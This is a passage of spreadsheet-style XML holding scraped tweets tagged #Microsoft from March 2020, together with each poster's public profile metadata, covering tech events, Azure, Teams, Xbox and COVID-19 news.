'http://pbs.twimg.com/profile_images/1156871621795205122/Odp5xY_G_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1156871621795205122/Odp5xY_G_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1126807393889705984/1564655321',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</si>
  <si>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10:36:20 +0000 2020</t>
  </si>
  <si>
    <t>Join us tomorrow at #Microsoft Nederland for our session at 10u30. #365SatAMS #PowerPlatform. We have still some available spots! Register at https://t.co/M1Gn9Vd5ag https://t.co/VTMx5BU8g0</t>
  </si>
  <si>
    <t>{'id': 722774177401479171, 'id_str': '722774177401479171', 'name': 'Frederik Bisback', 'screen_name': 'BisbackFrederik', 'location': 'Beervelde', 'description': '#PowerPlatform || #BEPAFUG || #PowerUSerDays BE || #serverless ||  #LogicApps || #PowerAddicts || Azure #Integration Services || #Azure || #LessCodeMorePower', 'url': 'https://t.co/CWok7h7xTU', 'entities': {'url': {'urls': [{'url': 'https://t.co/CWok7h7xTU', 'expanded_url': 'http://blog.pronict.net', 'display_url': 'blog.pronict.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 373, 'friends_count': 873, 'listed_count': 13, 'created_at': 'Wed Apr 20 13:09:27 +0000 2016', 'favourites_count': 2101, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 596,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'http://pbs.twimg.com/profile_images/1214516790589579265/UbVYpcUS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1214516790589579265/UbVYpcUS_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/722774177401479171/1569610952',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</si>
  <si>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10:33:18 +0000 2020</t>
  </si>
  <si>
    <t>How To Solve The CORS Or The Access-Control-Allow-Origin Header Error In .NET by @faisalmpathan #cors #error #Origin #Microsoft #webconfig https://t.co/aU2peCd8Db</t>
  </si>
  <si>
    <t>{'id': 1127869353330790400, 'id_str': '1127869353330790400', 'name': 'The Code Hubs', 'screen_name': 'TheCodeHubs', 'location': 'INDIA', 'description': 'TheCodeHubs started from the idea that there exists a group of developers who respond more suited to online content and prefer to learn new techniques at their', 'url': 'https://t.co/wnzpatSzVL', 'entities': {'url': {'urls': [{'url': 'https://t.co/wnzpatSzVL', 'expanded_url': 'http://thecodehubs.com/', 'display_url': 'thecodehubs.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 71, 'friends_count': 420, 'listed_count': 0, 'created_at': 'Mon May 13 09:33:03 +0000 2019', 'favourites_count': 86,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'http://pbs.twimg.com/profile_images/1127879834569297921/yOBdqnDH_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1127879834569297921/yOBdqnDH_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1127869353330790400/1557742256',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</si>
  <si>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10:32:15 +0000 2020</t>
  </si>
  <si>
    <t>Todays PR to @docsmsft 
https://t.co/6zfzIuql85
#microsoft #azure #azurefamily</t>
  </si>
  <si>
    <t>{'id': 145447219, 'id_str': '145447219', 'name': 'Thomas Thornton', 'screen_name': 'tamstar1234', 'location': 'Belfast, Northern Ireland', 'description': '@kainossoftware - MSFT\nAzure Solutions Architect Expert, Azure DevOps Expert, \nMCSA: Cloud Platform,  Azure Administrator &amp; Azure Security Engineer Certified', 'url': 'https://t.co/E39kjovqNd', 'entities': {'url': {'urls': [{'url': 'https://t.co/E39kjovqNd', 'expanded_url': 'http://thomasthornton.cloud', 'display_url': 'thomasthornton.cloud', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1433, 'friends_count': 1374, 'listed_count': 29, 'created_at': 'Wed May 19 00:44:11 +0000 2010', 'favourites_count': 4656, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 5343,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1161734269775073280/0yapXacv_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1161734269775073280/0yapXacv_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/145447219/1545600680', 'profile_link_color': '0099CC',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</si>
  <si>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Fri Mar 06 10:32:10 +0000 2020</t>
  </si>
  <si>
    <t>Indias Yes Bank breakdown disrupts Walmarts PhonePe among a dozen other services https://t.co/QeEe09U3K8 #Microsoft</t>
  </si>
  <si>
    <t>{'id': 14585767, 'id_str': '14585767', 'name': 'Laurent MILTGEN', 'screen_name': 'kubernan', 'location': 'Luxembourg', 'description': 'ðŸ‘¾ #geeking in the (#microsoft) â˜ #cloud\nHead of #DigitalTransformation at @ElgontIT/@AinosDEV\n ðŸ¦ Tweets are my own', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 8024, 'friends_count': 5662, 'listed_count': 1139, 'created_at': 'Tue Apr 29 15:04:48 +0000 2008', 'favourites_count': 10280, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 70745,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'http://pbs.twimg.com/profile_images/913737908099649536/rJwvQr99_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/913737908099649536/rJwvQr99_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14585767/1550587151', 'profile_link_color': 'FA743E', 'profile_sidebar_border_color': '181A1E', 'profile_sidebar_fill_color': '252429', 'profile_text_color': '949294', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 10:30:22 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Xbox Series S console price leaks - it's quite cheap #microsoft #xboxseriess https://t.co/TOKolJ9ZK1 https://t.co/IovUqiKFVU</t>
  </si>
  <si>
    <t>{'id': 127674014, 'id_str': '127674014', 'name': 'Giz China', 'screen_name': 'Gizchina', 'location': 'Qingdao, China', 'description': 'Chinese technology and gadget guide!', 'url': 'http://t.co/siLBSqXGV3', 'entities': {'url': {'urls': [{'url': 'http://t.co/siLBSqXGV3', 'expanded_url': 'http://www.gizchina.com', 'display_url': 'gizchina.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 15053, 'friends_count': 455, 'listed_count': 314, 'created_at': 'Mon Mar 29 23:01:05 +0000 2010', 'favourites_count': 9, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 41803,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'http://pbs.twimg.com/profile_images/986948131190444032/ZD1Wo2Lr_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/986948131190444032/ZD1Wo2Lr_normal.jpg',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</si>
  <si>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Fri Mar 06 10:30:08 +0000 2020</t>
  </si>
  <si>
    <t>Making this simple change to your file explorer settings could help protect you from malicious software. It takes less than 5 minutes to do and could save you a lot of trouble.
#Microsoft #Windows10 #CyberSecurity 
https://t.co/PtqmcUGzO7 - @LawrenceAbrams</t>
  </si>
  <si>
    <t>{'id': 708287360639836161, 'id_str': '708287360639836161', 'name': 'Martin Riley', 'screen_name': 'QCSProfessional', 'location': "Wherever there's cake", 'description': "I'm a consultant who helps #SMEs use technology for smarter working, marketing, and becoming more profitable. Follow me for #SmallBusiness #TechTips ðŸ™‚", 'url': 'https://t.co/pBAyznycdB', 'entities': {'url': {'urls': [{'url': 'https://t.co/pBAyznycdB', 'expanded_url': 'http://vcard.quantumcs.co.uk', 'display_url': 'vcard.quantumcs.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 358, 'friends_count': 522, 'listed_count': 65, 'created_at': 'Fri Mar 11 13:44:00 +0000 2016', 'favourites_count': 2281, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1307,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'http://pbs.twimg.com/profile_images/881972288094076929/G5O7YoiL_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/881972288094076929/G5O7YoiL_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/708287360639836161/1499114118', 'profile_link_color': '369C9D',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</si>
  <si>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10:26:34 +0000 2020</t>
  </si>
  <si>
    <t>Anyone's facing performance issues in Visual Studio today? #visualstudio #issues #performance #problems #microsoft</t>
  </si>
  <si>
    <t>{'id': 940454941, 'id_str': '940454941', 'name': 'MÃ¡rio Marques', 'screen_name': 'mariomarquesinf', 'location': 'Viana do Castelo', 'description': '', 'url': 'https://t.co/2q8XhQITNe', 'entities': {'url': {'urls': [{'url': 'https://t.co/2q8XhQITNe', 'expanded_url': 'http://www.mariomarquesinf.com', 'display_url': 'mariomarquesinf.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 33, 'friends_count': 129, 'listed_count': 2, 'created_at': 'Sun Nov 11 03:12:34 +0000 2012', 'favourites_count': 398, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 256,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'http://pbs.twimg.com/profile_images/1169010358239072260/d8dc726o_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1169010358239072260/d8dc726o_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/940454941/1550404595',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</si>
  <si>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10:26:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Enterprise Mobility + Security helps businesses to manage devices and digital identities, all in one integrated package. 
Find out why #MicrosoftEMS and #Office365 work so well together, in this insightful #blog.
#Microsoft365 #Security #EMS
https://t.co/WJqe3Kd2ZY https://t.co/hF7t0kKXVN</t>
  </si>
  <si>
    <t>{'id': 3367379843, 'id_str': '3367379843', 'name': 'Identity Experts', 'screen_name': 'IdentityExperts', 'location': 'United Kingdom', 'description': 'Celebrated  UK #security and #IdentityAccessManagement consultancy. \n\nTrain with the experts: #MIM Foundation training now available https://t.co/EH8ezK7zRY', 'url': 'https://t.co/qqVa0p2hDk', 'entities': {'url': {'urls': [{'url': 'https://t.co/qqVa0p2hDk', 'expanded_url': 'http://www.identityexperts.co.uk/', 'display_url': 'identityexperts.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/EH8ezK7zRY', 'expanded_url': 'http://bit.ly/iEMIMFoundation', 'display_url': 'bit.ly/iEMIMFoundation', 'indices': [133, 156]}]}}, 'protected': False, 'followers_count': 247, 'friends_count': 354, 'listed_count': 1, 'created_at': 'Thu Jul 09 09:45:30 +0000 2015', 'favourites_count': 1234, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1508,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'http://pbs.twimg.com/profile_images/1105405515008495617/dGz3N7IZ_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105405515008495617/dGz3N7IZ_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3367379843/1570200128', 'profile_link_color': 'EF7738',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</si>
  <si>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10:25:40 +0000 2020</t>
  </si>
  <si>
    <t>Check out the breakout sessions https://t.co/ugApVuMo8b we lined up for you in 3 parallel tracks at #ExpertsLiveCH on June 25, 2020 in Bern, Switzerland. National and international top speakers are presenting 100% #Microsoft tech to our #community! See you there?</t>
  </si>
  <si>
    <t>{'id': 765898301824729088, 'id_str': '765898301824729088', 'name': 'Experts Live Switzerland', 'screen_name': 'ExpertsLiveCH', 'location': 'Bern, Switzerland', 'description': 'Experts Live Switzerland is an IT community conference focused on #Microsoft cloud, datacenter, security and modern workplace solutions. June 25 | Bern', 'url': 'https://t.co/la9fSdHvJt', 'entities': {'url': {'urls': [{'url': 'https://t.co/la9fSdHvJt', 'expanded_url': 'https://www.expertslive.ch/', 'display_url': 'expertslive.ch', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 390, 'friends_count': 293, 'listed_count': 2, 'created_at': 'Wed Aug 17 13:09:19 +0000 2016', 'favourites_count': 683, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 704, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1040276386244702209/vOLlOldz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1040276386244702209/vOLlOldz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/765898301824729088/1512744125',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</si>
  <si>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10:25:07 +0000 2020</t>
  </si>
  <si>
    <t>Getting ready to implement #Microsoft #Dynamics365? Great. 
Before you get started, make sure you check out these tips from #Dynamics expert, Deepesh Somani (@msdynamicsblog): https://t.co/HS68FlOqcq https://t.co/RmTztVijYY</t>
  </si>
  <si>
    <t>{'id': 44873738, 'id_str': '44873738', 'name': 'Nigel Frank Intl.', 'screen_name': 'NigelFrank', 'location': 'UK, USA, Germany, Netherlands, Spain, Singapore &amp; Australia', 'description': "We're the global leader in permanent and freelance @Microsoft tech recruitment. #Azure, #MSDynamics, #SharePoint, Skype for Business, BI, O365.", 'url': 'https://t.co/JtjSWfkjqO', 'entities': {'url': {'urls': [{'url': 'https://t.co/JtjSWfkjqO', 'expanded_url': 'http://nigelfrank.com', 'display_url': 'nigelfrank.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3364, 'friends_count': 2984, 'listed_count': 169, 'created_at': 'Fri Jun 05 11:40:58 +0000 2009', 'favourites_count': 1795, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 6934,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'http://pbs.twimg.com/profile_images/1235616418688839680/-bvp4TEj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1235616418688839680/-bvp4TEj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/44873738/1529658691',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</si>
  <si>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10:25:00 +0000 2020</t>
  </si>
  <si>
    <t>Is anyone else experiencing #microsoft Edge (chrome) not responding to javascript:void(0) links? Gone from being the almost the goto browser, to favouring uninstall - Version 82.0.439.1 (Official build) dev (64-bit)</t>
  </si>
  <si>
    <t>{'id': 20954494, 'id_str': '20954494', 'name': 'Dave Poyser', 'screen_name': 'dpoyser', 'location': 'Crewe, England', 'description': 'Father, DJ &amp; gadget lover. Document management consultant, developer. Views expressed are my own (except where blatantly copied)', 'url': 'http://t.co/kQIMP9A4XW', 'entities': {'url': {'urls': [{'url': 'http://t.co/kQIMP9A4XW', 'expanded_url': 'http://www.xpressdocs.co.uk', 'display_url': 'xpressdocs.co.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 729, 'friends_count': 1171, 'listed_count': 32, 'created_at': 'Mon Feb 16 01:50:55 +0000 2009', 'favourites_count': 33, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 11012,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'http://pbs.twimg.com/profile_images/893547985417764864/Wy0RS0sV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/893547985417764864/Wy0RS0sV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20954494/1426071002',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</si>
  <si>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10:23:08 +0000 2020</t>
  </si>
  <si>
    <t>"Businesses such as #Microsoft, #BlueCross, #BlueShield, and #Gap have worked with consultants to leverage #authenticity in the #workplace."
https://t.co/vitWlcCHbs</t>
  </si>
  <si>
    <t>{'id': 827965449396744192, 'id_str': '827965449396744192', 'name': 'D.S. Ketelby', 'screen_name': 'Axolotl51', 'location': 'Somerset, United Kingdom', 'description': 'writer (weird fiction, urban fantasy, poems... &amp; see website)', 'url': 'https://t.co/Zrw86dkZdE', 'entities': {'url': {'urls': [{'url': 'https://t.co/Zrw86dkZdE', 'expanded_url': 'http://twentysevenwordreviews.blogspot.com', 'display_url': 'twentysevenwordreviews.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 6500, 'friends_count': 2004, 'listed_count': 20, 'created_at': 'Sat Feb 04 19:42:00 +0000 2017', 'favourites_count': 12473, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 194,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'http://pbs.twimg.com/profile_images/1034927363170160641/Nx_h7YlK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1034927363170160641/Nx_h7YlK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/827965449396744192/1535746230',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</si>
  <si>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10:20:04 +0000 2020</t>
  </si>
  <si>
    <t>#Microsofts Airband live in 25 states at midpoint of rural broadband project https://t.co/MzSAic8kv3</t>
  </si>
  <si>
    <t>{'id': 23236000, 'id_str': '23236000', 'name': 'Exclaimer', 'screen_name': 'Exclaimer', 'location': 'Worldwide', 'description': 'Award-winning solutions for managing corporate #emailsignatures in #Office365, #GSuite, #MSExchange &amp; #Outlook.', 'url': 'http://t.co/iUifEMVJ6H', 'entities': {'url': {'urls': [{'url': 'http://t.co/iUifEMVJ6H', 'expanded_url': 'http://www.exclaimer.com', 'display_url': 'exclaimer.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3724, 'friends_count': 989, 'listed_count': 262, 'created_at': 'Sat Mar 07 21:20:00 +0000 2009', 'favourites_count': 4660, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 15362, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '6D93BD', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme14/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/715472820134739969/ifBWxZCj_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/715472820134739969/ifBWxZCj_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/23236000/1565705629',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</si>
  <si>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Mar 06 10:12:44 +0000 2020</t>
  </si>
  <si>
    <t>This is a EUR 150 upgrade to Pro, member of a Windows 2016 domain, and the weather app has ads... I wonder if they advertise on the Educational version also. #ad #windows #microsoft https://t.co/Bcsh2iBIta</t>
  </si>
  <si>
    <t>{'id': 1168803850041659393, 'id_str': '1168803850041659393', 'name': 'BammBamm', 'screen_name': 'GeoNaumov', 'location': 'Cyprus', 'description': 'ðŸ»ðŸ ðŸ“°ðŸ“ŠðŸ›¡ðŸ§ðŸš˜ðŸ‡¨ðŸ‡¾ðŸ‡§ðŸ‡¬ðŸ‡ªðŸ‡º I will not bam bam you. All views are personal.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 56, 'friends_count': 55, 'listed_count': 1, 'created_at': 'Tue Sep 03 08:32:19 +0000 2019', 'favourites_count': 2357, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1850, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1183683522856411137/Xd776u8H_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1183683522856411137/Xd776u8H_normal.jpg',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</si>
  <si>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10:11:38 +0000 2020</t>
  </si>
  <si>
    <t>Industrial Technology Research Institute uses advanced #cloud technology to help #SMBs accelerate #intelligent #manufacturing - #Microsoft #ITRI #Taiwan https://t.co/Vuwkx3sgS6 #MSFTAdvocate</t>
  </si>
  <si>
    <t>{'id': 1592732142, 'id_str': '1592732142', 'name': 'Aydin Aslaner', 'screen_name': 'AydinMSFT', 'location': 'Dubai, United Arab Emirates', 'description': 'Head of #Microsoft #CyberSecurity Public Sector team in Middle East &amp; Africa - #Dubai #UAE #Turkey #Istanbul', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 2717, 'friends_count': 3494, 'listed_count': 64, 'created_at': 'Sun Jul 14 07:03:20 +0000 2013', 'favourites_count': 24298, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 25059,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'http://pbs.twimg.com/profile_images/1230492952658661377/a0tjJOKw_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1230492952658661377/a0tjJOKw_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1592732142/1521548249',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</si>
  <si>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10:08:10 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft Office 365 for End Users
#Microsoft #MicrosoftMalaysia #MicrosoftOffice #Office #365 #Cloud  #Corporate #CorporateTraining #IT #CorporateIT #CorporateITTraining #Training #Education #Learning #MCT... https://t.co/eDhAPdytp0</t>
  </si>
  <si>
    <t>{'id': 973137528, 'id_str': '973137528', 'name': 'Ridzuan Rashid', 'screen_name': 'RidzuanRashid72', 'location': 'Malaysia', 'description': 'Owner, Principal Photographer &amp; Trainer @ MRBAR Photo Works', 'url': 'https://t.co/cpfe1tXIL9', 'entities': {'url': {'urls': [{'url': 'https://t.co/cpfe1tXIL9', 'expanded_url': 'http://www.mrbarphotoworks.com', 'display_url': 'mrbarphotoworks.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 69, 'friends_count': 135, 'listed_count': 15, 'created_at': 'Tue Nov 27 02:57:47 +0000 2012', 'favourites_count': 136, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3438,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'http://pbs.twimg.com/profile_images/730376958786207744/EyXrPK9__normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/730376958786207744/EyXrPK9__normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/973137528/1358142320', 'profile_link_color': '038543',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</si>
  <si>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10:06:47 +0000 2020</t>
  </si>
  <si>
    <t>I am a fan of nude meeting single guys #Microsoft</t>
  </si>
  <si>
    <t>{'id': 744213818612584448, 'id_str': '744213818612584448', 'name': 'Spam Magnet', 'screen_name': 'SpamMagnetBot', 'location': '', 'description': 'Please tell me more about your product or service! A bot by @danhett', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 113, 'friends_count': 0, 'listed_count': 149, 'created_at': 'Sat Jun 18 17:02:56 +0000 2016', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 64766,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'http://pbs.twimg.com/profile_images/744214186130083840/4e3RVeQO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/744214186130083840/4e3RVeQO_normal.jpg',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</si>
  <si>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10:04:35 +0000 2020</t>
  </si>
  <si>
    <t>Get the result of your failed actions #InPower Automate #automation #action https://t.co/pscn6EeJ9i #Microsoft #Office #Office365</t>
  </si>
  <si>
    <t>{'id': 332884378, 'id_str': '332884378', 'name': 'Hagen Deike', 'screen_name': 'hd_ka', 'location': 'Karlsruhe', 'description': 'IT-Professional, Infrastructure Architect &amp; SharePoint Ninja', 'url': 'https://t.co/wHAlI6x8Ba', 'entities': {'url': {'urls': [{'url': 'https://t.co/wHAlI6x8Ba', 'expanded_url': 'http://blog.greenbrain.de', 'display_url': 'blog.greenbrain.de', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 508, 'friends_count': 798, 'listed_count': 100, 'created_at': 'Sun Jul 10 16:03:43 +0000 2011', 'favourites_count': 431, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6123,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'http://pbs.twimg.com/profile_images/1105075118882078720/OfCUVg7w_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1105075118882078720/OfCUVg7w_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/332884378/1538608258', 'profile_link_color': '7BBB00', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'D35400', 'profile_text_color': '7ABB00', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Fri Mar 06 10:03:31 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft  - How Changing my Name Strengthened my Self-Concept  https://t.co/DnW7PCs2dh</t>
  </si>
  <si>
    <t>{'id': 14541998, 'id_str': '14541998', 'name': 'Dipti Chhatrapati', 'screen_name': 'dips84', 'location': 'Mumbai', 'description': 'Exploring insights of Microsoft Technologies #insightrun, curious soul and enthusiastic learner - SharePoint is a first love ðŸ’– [ Microsoft Regional Director ]', 'url': 'https://t.co/7CpK8YGEBE', 'entities': {'url': {'urls': [{'url': 'https://t.co/7CpK8YGEBE', 'expanded_url': 'http://insightrun.com/', 'display_url': 'insightrun.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 789, 'friends_count': 1489, 'listed_count': 48, 'created_at': 'Sat Apr 26 09:47:15 +0000 2008', 'favourites_count': 1045, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 2806,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'http://pbs.twimg.com/profile_images/1162273236475768833/GkyjzbUp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1162273236475768833/GkyjzbUp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/14541998/1562246588',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</si>
  <si>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10:03:03 +0000 2020</t>
  </si>
  <si>
    <t>We are proud to announce Cygnet IT is officially a Microsoft Partner!  
#Microsoft #microsoftpartner #CygnetIT https://t.co/yyZ9gKBem8</t>
  </si>
  <si>
    <t>{'id': 804738892587008000, 'id_str': '804738892587008000', 'name': 'Cygnet IT Services', 'screen_name': 'cygnetcic', 'location': 'Wallington, London', 'description': 'Cygnet IT Services CIC provides specialist support to schools, businesses and charities, delivering professional IT services with a personal touch.', 'url': 'https://t.co/R6DWhG8ASW', 'entities': {'url': {'urls': [{'url': 'https://t.co/R6DWhG8ASW', 'expanded_url': 'http://www.cygnet.it', 'display_url': 'cygnet.it', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 192, 'friends_count': 646, 'listed_count': 2, 'created_at': 'Fri Dec 02 17:27:58 +0000 2016', 'favourites_count': 174, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 206,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'http://pbs.twimg.com/profile_images/880012776332283904/o9H7jtgE_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/880012776332283904/o9H7jtgE_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/804738892587008000/1578993996', 'profile_link_color': '1C75BC',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</si>
  <si>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10:00:45 +0000 2020</t>
  </si>
  <si>
    <t>Dont miss our next Excel Training starting at the end of this month.
To learn more about the training, click on this link: https://t.co/U5rynJmiS4
or call NIYI on 08162625986.
.
#scilsmgtcentre #training #management #excel #microsoft #microsoftexcel #opebi #ikeja #Buhari #TGIF https://t.co/oCiIt2hUmT</t>
  </si>
  <si>
    <t>{'id': 3385557209, 'id_str': '3385557209', 'name': 'SCILS MANAGEMENT CENTRE', 'screen_name': 'scilsmanagement', 'location': '58, Opebi road ikeja lagos, NG', 'description': 'SCILS Management Centre is a human capacity development organization involved in training and business development consulting through its partnership with ...', 'url': 'https://t.co/lytVbFbF61', 'entities': {'url': {'urls': [{'url': 'https://t.co/lytVbFbF61', 'expanded_url': 'http://www.scilsng.com', 'display_url': 'scilsng.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 832, 'friends_count': 1401, 'listed_count': 14, 'created_at': 'Tue Jul 21 07:44:35 +0000 2015', 'favourites_count': 147, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4107,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'http://pbs.twimg.com/profile_images/1198277071669211139/qvTzMd4c_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1198277071669211139/qvTzMd4c_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3385557209/1582544360',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</si>
  <si>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10:00:29 +0000 2020</t>
  </si>
  <si>
    <t>To support teams and companies in these complex times, Microsoft is giving free Teams licenses with all the features enabled (including video meetings and live events) valid through January 2021. https://t.co/OvUKQwDgsD #microsoft #MicrosoftTeams</t>
  </si>
  <si>
    <t>{'id': 45595208, 'id_str': '45595208', 'name': 'Matteo Pagani', 'screen_name': 'qmatteoq', 'location': 'Como', 'description': 'Windows AppConsult Engineer in @Microsoft, Windows development enthusiast, former Microsoft MVP. Having fun with Windows apps. Opinions are my own.', 'url': 'https://t.co/pBuVSdGtIT', 'entities': {'url': {'urls': [{'url': 'https://t.co/pBuVSdGtIT', 'expanded_url': 'https://aka.ms/appconsultblog', 'display_url': 'aka.ms/appconsultblog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3517, 'friends_count': 606, 'listed_count': 169, 'created_at': 'Mon Jun 08 15:52:32 +0000 2009', 'favourites_count': 720, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 26603,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'http://pbs.twimg.com/profile_images/587911661526327296/ZpWZRPcp_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/587911661526327296/ZpWZRPcp_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/45595208/1410425278',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</si>
  <si>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10:00:10 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft asks staff to work from home due to Covid-19 outbreak
#coronavirus #CoronavirusOutbreak 
